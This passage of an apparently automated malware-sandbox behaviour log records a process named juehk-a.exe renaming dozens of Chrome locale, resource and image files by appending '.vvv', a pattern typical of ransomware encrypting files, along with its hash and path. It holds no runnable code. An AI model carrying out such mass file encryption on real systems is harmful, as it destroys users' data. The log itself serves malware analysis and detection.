35577.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fa.pak.vvv
35578.            ads:
35579.          fid (ads:): 844424930217276
35580.          ntstatus: 0x0
35581.          CreateOptions: 0x0
35582.        file:
35583.          timestamp: 188369
35584.          mode: rename
35585.          sequenceNumber: 2492
35586.          filesize: 261374
35587.          processinfo:
35588.            pid: 1648
35589.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35590.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35591.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fi.pak
35592.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fi.pak.vvv
35593.            ads:
35594.          fid (ads:): 1125899906927935
35595.          ntstatus: 0x0
35596.          CreateOptions: 0x0
35597.        file:
35598.          timestamp: 188401
35599.          mode: rename
35600.          sequenceNumber: 2493
35601.          filesize: 283294
35602.          processinfo:
35603.            pid: 1648
35604.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35606.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fil.pak
35607.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fil.pak.vvv
35608.            ads:
35609.          fid (ads:): 1125899906927940
35610.          ntstatus: 0x0
35611.          CreateOptions: 0x0
35612.        file:
35613.          timestamp: 188493
35614.          repeat: 20000
35615.          mode: close
35616.          sequenceNumber: 2494
35617.          value: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fr.pak
35618.          filesize: 294206
35619.          processinfo:
35620.            pid: 1648
35621.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35622.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35623.            ads:
35624.          fid (ads:): 1125899906927941
35625.          ntstatus: 0x0
35626.          CreateOptions: 0x0
35627.        file:
35628.          timestamp: 188499
35629.          mode: rename
35630.          sequenceNumber: 2495
35631.          filesize: 294206
35632.          processinfo:
35633.            pid: 1648
35634.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35635.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35636.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fr.pak
35637.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fr.pak.vvv
35638.            ads:
35639.          fid (ads:): 1125899906927941
35640.          ntstatus: 0x0
35641.          CreateOptions: 0x0
35642.        file:
35643.          timestamp: 188538
35644.          mode: rename
35645.          sequenceNumber: 2496
35646.          filesize: 553534
35647.          processinfo:
35648.            pid: 1648
35649.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35650.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35651.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\gu.pak
35652.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\gu.pak.vvv
35653.            ads:
35654.          fid (ads:): 1125899906927942
35655.          ntstatus: 0x0
35656.          CreateOptions: 0x0
35657.        file:
35658.          timestamp: 188554
35659.          mode: rename
35660.          sequenceNumber: 2497
35661.          filesize: 317774
35662.          processinfo:
35663.            pid: 1648
35664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35666.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\he.pak
35667.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\he.pak.vvv
35668.            ads:
35669.          fid (ads:): 1125899906927943
35670.          ntstatus: 0x0
35671.          CreateOptions: 0x0
35672.        file:
35673.          timestamp: 188603
35674.          mode: rename
35675.          sequenceNumber: 2498
35676.          filesize: 569486
35677.          processinfo:
35678.            pid: 1648
35679.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35680.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35681.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hi.pak
35682.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hi.pak.vvv
35683.            ads:
35684.          fid (ads:): 1125899906927944
35685.          ntstatus: 0x0
35686.          CreateOptions: 0x0
35687.        file:
35688.          timestamp: 188632
35689.          mode: rename
35690.          sequenceNumber: 2499
35691.          filesize: 260366
35692.          processinfo:
35693.            pid: 1648
35694.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35695.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35696.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hr.pak
35697.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hr.pak.vvv
35698.            ads:
35699.          fid (ads:): 1125899906927945
35700.          ntstatus: 0x0
35701.          CreateOptions: 0x0
35702.        file:
35703.          timestamp: 188648
35704.          mode: rename
35705.          sequenceNumber: 2500
35706.          filesize: 291710
35707.          processinfo:
35708.            pid: 1648
35709.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35711.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hu.pak
35712.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\hu.pak.vvv
35713.            ads:
35714.          fid (ads:): 1125899906927946
35715.          ntstatus: 0x0
35716.          CreateOptions: 0x0
35717.        file:
35718.          timestamp: 188664
35719.          mode: rename
35720.          sequenceNumber: 2501
35721.          filesize: 250750
35722.          processinfo:
35723.            pid: 1648
35724.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35725.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35726.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\id.pak
35727.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\id.pak.vvv
35728.            ads:
35729.          fid (ads:): 1125899906927947
35730.          ntstatus: 0x0
35731.          CreateOptions: 0x0
35732.        file:
35733.          timestamp: 188681
35734.          mode: rename
35735.          sequenceNumber: 2502
35736.          filesize: 271470
35737.          processinfo:
35738.            pid: 1648
35739.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35740.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35741.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\it.pak
35742.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\it.pak.vvv
35743.            ads:
35744.          fid (ads:): 1125899906927948
35745.          ntstatus: 0x0
35746.          CreateOptions: 0x0
35747.        file:
35748.          timestamp: 188700
35749.          mode: rename
35750.          sequenceNumber: 2503
35751.          filesize: 332622
35752.          processinfo:
35753.            pid: 1648
35754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35756.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ja.pak
35757.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ja.pak.vvv
35758.            ads:
35759.          fid (ads:): 1125899906927949
35760.          ntstatus: 0x0
35761.          CreateOptions: 0x0
35762.        file:
35763.          timestamp: 188723
35764.          mode: rename
35765.          sequenceNumber: 2504
35766.          filesize: 634350
35767.          processinfo:
35768.            pid: 1648
35769.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35771.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\kn.pak
35772.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\kn.pak.vvv
35773.            ads:
35774.          fid (ads:): 1125899906927950
35775.          ntstatus: 0x0
35776.          CreateOptions: 0x0
35777.        file:
35778.          timestamp: 188741
35779.          mode: rename
35780.          sequenceNumber: 2505
35781.          filesize: 280878
35782.          processinfo:
35783.            pid: 1648
35784.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35786.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ko.pak
35787.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ko.pak.vvv
35788.            ads:
35789.          fid (ads:): 1125899906927951
35790.          ntstatus: 0x0
35791.          CreateOptions: 0x0
35792.        file:
35793.          timestamp: 188759
35794.          mode: rename
35795.          sequenceNumber: 2506
35796.          filesize: 272846
35797.          processinfo:
35798.            pid: 1648
35799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35801.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lt.pak
35802.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lt.pak.vvv
35803.            ads:
35804.          fid (ads:): 1125899906927952
35805.          ntstatus: 0x0
35806.          CreateOptions: 0x0
35807.        file:
35808.          timestamp: 188808
35809.          mode: rename
35810.          sequenceNumber: 2507
35811.          filesize: 278238
35812.          processinfo:
35813.            pid: 1648
35814.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35815.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35816.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lv.pak
35817.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\lv.pak.vvv
35818.            ads:
35819.          fid (ads:): 1125899906927953
35820.          ntstatus: 0x0
35821.          CreateOptions: 0x0
35822.        file:
35823.          timestamp: 188834
35824.          mode: rename
35825.          sequenceNumber: 2508
35826.          filesize: 734782
35827.          processinfo:
35828.            pid: 1648
35829.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35830.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35831.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ml.pak
35832.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ml.pak.vvv
35833.            ads:
35834.          fid (ads:): 1125899906927954
35835.          ntstatus: 0x0
35836.          CreateOptions: 0x0
35837.        file:
35838.          timestamp: 188857
35839.          mode: rename
35840.          sequenceNumber: 2509
35841.          filesize: 562014
35842.          processinfo:
35843.            pid: 1648
35844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35846.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\mr.pak
35847.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\mr.pak.vvv
35848.            ads:
35849.          fid (ads:): 1125899906927955
35850.          ntstatus: 0x0
35851.          CreateOptions: 0x0
35852.        file:
35853.          timestamp: 188897
35854.          mode: rename
35855.          sequenceNumber: 2510
35856.          filesize: 207806
35857.          processinfo:
35858.            pid: 1648
35859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35861.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ms.pak
35862.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ms.pak.vvv
35863.            ads:
35864.          fid (ads:): 1125899906927956
35865.          ntstatus: 0x0
35866.          CreateOptions: 0x0
35867.        file:
35868.          timestamp: 188911
35869.          mode: rename
35870.          sequenceNumber: 2511
35871.          filesize: 252238
35872.          processinfo:
35873.            pid: 1648
35874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35876.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nb.pak
35877.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nb.pak.vvv
35878.            ads:
35879.          fid (ads:): 1125899906927957
35880.          ntstatus: 0x0
35881.          CreateOptions: 0x0
35882.        file:
35883.          timestamp: 188929
35884.          mode: rename
35885.          sequenceNumber: 2512
35886.          filesize: 269422
35887.          processinfo:
35888.            pid: 1648
35889.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35891.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nl.pak
35892.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\nl.pak.vvv
35893.            ads:
35894.          fid (ads:): 1125899906927958
35895.          ntstatus: 0x0
35896.          CreateOptions: 0x0
35897.        file:
35898.          timestamp: 188945
35899.          mode: rename
35900.          sequenceNumber: 2513
35901.          filesize: 274318
35902.          processinfo:
35903.            pid: 1648
35904.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35905.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35906.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pl.pak
35907.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pl.pak.vvv
35908.            ads:
35909.          fid (ads:): 1125899906927959
35910.          ntstatus: 0x0
35911.          CreateOptions: 0x0
35912.        file:
35913.          timestamp: 188963
35914.          mode: rename
35915.          sequenceNumber: 2514
35916.          filesize: 269118
35917.          processinfo:
35918.            pid: 1648
35919.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35920.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35921.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-BR.pak
35922.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-BR.pak.vvv
35923.            ads:
35924.          fid (ads:): 1125899906927960
35925.          ntstatus: 0x0
35926.          CreateOptions: 0x0
35927.        file:
35928.          timestamp: 188980
35929.          mode: rename
35930.          sequenceNumber: 2515
35931.          filesize: 274222
35932.          processinfo:
35933.            pid: 1648
35934.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35935.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35936.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-PT.pak
35937.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\pt-PT.pak.vvv
35938.            ads:
35939.          fid (ads:): 1125899906927961
35940.          ntstatus: 0x0
35941.          CreateOptions: 0x0
35942.        file:
35943.          timestamp: 189148
35944.          mode: rename
35945.          sequenceNumber: 2516
35946.          filesize: 286414
35947.          processinfo:
35948.            pid: 1648
35949.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35950.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35951.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ro.pak
35952.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ro.pak.vvv
35953.            ads:
35954.          fid (ads:): 1125899906927963
35955.          ntstatus: 0x0
35956.          CreateOptions: 0x0
35957.        file:
35958.          timestamp: 189175
35959.          mode: rename
35960.          sequenceNumber: 2517
35961.          filesize: 437406
35962.          processinfo:
35963.            pid: 1648
35964.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35966.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ru.pak
35967.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ru.pak.vvv
35968.            ads:
35969.          fid (ads:): 1125899906927964
35970.          ntstatus: 0x0
35971.          CreateOptions: 0x0
35972.        file:
35973.          timestamp: 189286
35974.          mode: rename
35975.          sequenceNumber: 2518
35976.          filesize: 288478
35977.          processinfo:
35978.            pid: 1648
35979.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35981.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sk.pak
35982.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sk.pak.vvv
35983.            ads:
35984.          fid (ads:): 1125899906927965
35985.          ntstatus: 0x0
35986.          CreateOptions: 0x0
35987.        file:
35988.          timestamp: 189303
35989.          mode: rename
35990.          sequenceNumber: 2519
35991.          filesize: 255550
35992.          processinfo:
35993.            pid: 1648
35994.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
35995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
35996.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sl.pak
35997.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sl.pak.vvv
35998.            ads:
35999.          fid (ads:): 1125899906927966
36000.          ntstatus: 0x0
36001.          CreateOptions: 0x0
36002.        file:
36003.          timestamp: 189323
36004.          mode: rename
36005.          sequenceNumber: 2520
36006.          filesize: 422446
36007.          processinfo:
36008.            pid: 1648
36009.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36010.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36011.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sr.pak
36012.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sr.pak.vvv
36013.            ads:
36014.          fid (ads:): 1125899906927967
36015.          ntstatus: 0x0
36016.          CreateOptions: 0x0
36017.        file:
36018.          timestamp: 189347
36019.          mode: rename
36020.          sequenceNumber: 2521
36021.          filesize: 254670
36022.          processinfo:
36023.            pid: 1648
36024.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36026.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sv.pak
36027.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sv.pak.vvv
36028.            ads:
36029.          fid (ads:): 1125899906927968
36030.          ntstatus: 0x0
36031.          CreateOptions: 0x0
36032.        file:
36033.          timestamp: 189363
36034.          mode: rename
36035.          sequenceNumber: 2522
36036.          filesize: 232206
36037.          processinfo:
36038.            pid: 1648
36039.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36041.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sw.pak
36042.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\sw.pak.vvv
36043.            ads:
36044.          fid (ads:): 1125899906927969
36045.          ntstatus: 0x0
36046.          CreateOptions: 0x0
36047.        file:
36048.          timestamp: 189387
36049.          mode: rename
36050.          sequenceNumber: 2523
36051.          filesize: 665358
36052.          processinfo:
36053.            pid: 1648
36054.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36056.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ta.pak
36057.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ta.pak.vvv
36058.            ads:
36059.          fid (ads:): 1125899906927970
36060.          ntstatus: 0x0
36061.          CreateOptions: 0x0
36062.        file:
36063.          timestamp: 189411
36064.          mode: rename
36065.          sequenceNumber: 2524
36066.          filesize: 618830
36067.          processinfo:
36068.            pid: 1648
36069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36071.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\te.pak
36072.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\te.pak.vvv
36073.            ads:
36074.          fid (ads:): 1125899906927971
36075.          ntstatus: 0x0
36076.          CreateOptions: 0x0
36077.        file:
36078.          timestamp: 189434
36079.          mode: rename
36080.          sequenceNumber: 2525
36081.          filesize: 563742
36082.          processinfo:
36083.            pid: 1648
36084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36086.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\th.pak
36087.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\th.pak.vvv
36088.            ads:
36089.          fid (ads:): 1125899906927972
36090.          ntstatus: 0x0
36091.          CreateOptions: 0x0
36092.        file:
36093.          timestamp: 189453
36094.          mode: rename
36095.          sequenceNumber: 2526
36096.          filesize: 275886
36097.          processinfo:
36098.            pid: 1648
36099.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36101.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\tr.pak
36102.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\tr.pak.vvv
36103.            ads:
36104.          fid (ads:): 1125899906927973
36105.          ntstatus: 0x0
36106.          CreateOptions: 0x0
36107.        file:
36108.          timestamp: 189474
36109.          mode: rename
36110.          sequenceNumber: 2527
36111.          filesize: 436158
36112.          processinfo:
36113.            pid: 1648
36114.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36115.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36116.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\uk.pak
36117.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\uk.pak.vvv
36118.            ads:
36119.          fid (ads:): 1125899906927974
36120.          ntstatus: 0x0
36121.          CreateOptions: 0x0
36122.        file:
36123.          timestamp: 189491
36124.          mode: rename
36125.          sequenceNumber: 2528
36126.          filesize: 319246
36127.          processinfo:
36128.            pid: 1648
36129.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36130.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36131.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\vi.pak
36132.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\vi.pak.vvv
36133.            ads:
36134.          fid (ads:): 1125899906927975
36135.          ntstatus: 0x0
36136.          CreateOptions: 0x0
36137.        file:
36138.          timestamp: 189507
36139.          mode: rename
36140.          sequenceNumber: 2529
36141.          filesize: 224702
36142.          processinfo:
36143.            pid: 1648
36144.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36145.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36146.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-CN.pak
36147.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-CN.pak.vvv
36148.            ads:
36149.          fid (ads:): 1125899906927976
36150.          ntstatus: 0x0
36151.          CreateOptions: 0x0
36152.        file:
36153.          timestamp: 189523
36154.          mode: rename
36155.          sequenceNumber: 2530
36156.          filesize: 225950
36157.          processinfo:
36158.            pid: 1648
36159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36161.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-TW.pak
36162.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\zh-TW.pak.vvv
36163.            ads:
36164.          fid (ads:): 1125899906927977
36165.          ntstatus: 0x0
36166.          CreateOptions: 0x0
36167.        file:
36168.          timestamp: 190180
36169.          mode: rename
36170.          sequenceNumber: 2531
36171.          filesize: 12197566
36172.          processinfo:
36173.            pid: 1648
36174.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36176.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\resources.pak
36177.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\resources.pak.vvv
36178.            ads:
36179.          fid (ads:): 1125899906927962
36180.          ntstatus: 0x0
36181.          CreateOptions: 0x0
36182.        file:
36183.          timestamp: 190343
36184.          mode: rename
36185.          sequenceNumber: 2532
36186.          filesize: 1054
36187.          processinfo:
36188.            pid: 1648
36189.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36190.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36191.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\secondarytile.png
36192.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\secondarytile.png.vvv
36193.            ads:
36194.          fid (ads:): 1125899906927979
36195.          ntstatus: 0x0
36196.          CreateOptions: 0x0
36197.        file:
36198.          timestamp: 190375
36199.          mode: rename
36200.          sequenceNumber: 2533
36201.          filesize: 4398
36202.          processinfo:
36203.            pid: 1648
36204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36206.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\logo.png
36207.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\logo.png.vvv
36208.            ads:
36209.          fid (ads:): 1125899906927978
36210.          ntstatus: 0x0
36211.          CreateOptions: 0x0
36212.        file:
36213.          timestamp: 190406
36214.          mode: rename
36215.          sequenceNumber: 2534
36216.          filesize: 9710
36217.          processinfo:
36218.            pid: 1648
36219.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36220.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36221.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\smalllogo.png
36222.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\smalllogo.png.vvv
36223.            ads:
36224.          fid (ads:): 1407374883638636
36225.          ntstatus: 0x0
36226.          CreateOptions: 0x0
36227.        file:
36228.          timestamp: 190419
36229.          mode: rename
36230.          sequenceNumber: 2535
36231.          filesize: 10606
36232.          processinfo:
36233.            pid: 1648
36234.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36235.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36236.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\splash-620x300.png
36237.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\VisualElements\splash-620x300.png.vvv
36238.            ads:
36239.          fid (ads:): 1407374883638637
36240.          ntstatus: 0x0
36241.          CreateOptions: 0x0
36242.        file:
36243.          timestamp: 190543
36244.          mode: rename
36245.          sequenceNumber: 2536
36246.          filesize: 3438
36247.          processinfo:
36248.            pid: 1648
36249.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36251.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_128.png
36252.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_128.png.vvv
36253.            ads:
36254.          fid (ads:): 1407374883639500
36255.          ntstatus: 0x0
36256.          CreateOptions: 0x0
36257.        file:
36258.          timestamp: 190616
36259.          mode: rename
36260.          sequenceNumber: 2537
36261.          filesize: 558
36262.          processinfo:
36263.            pid: 1648
36264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
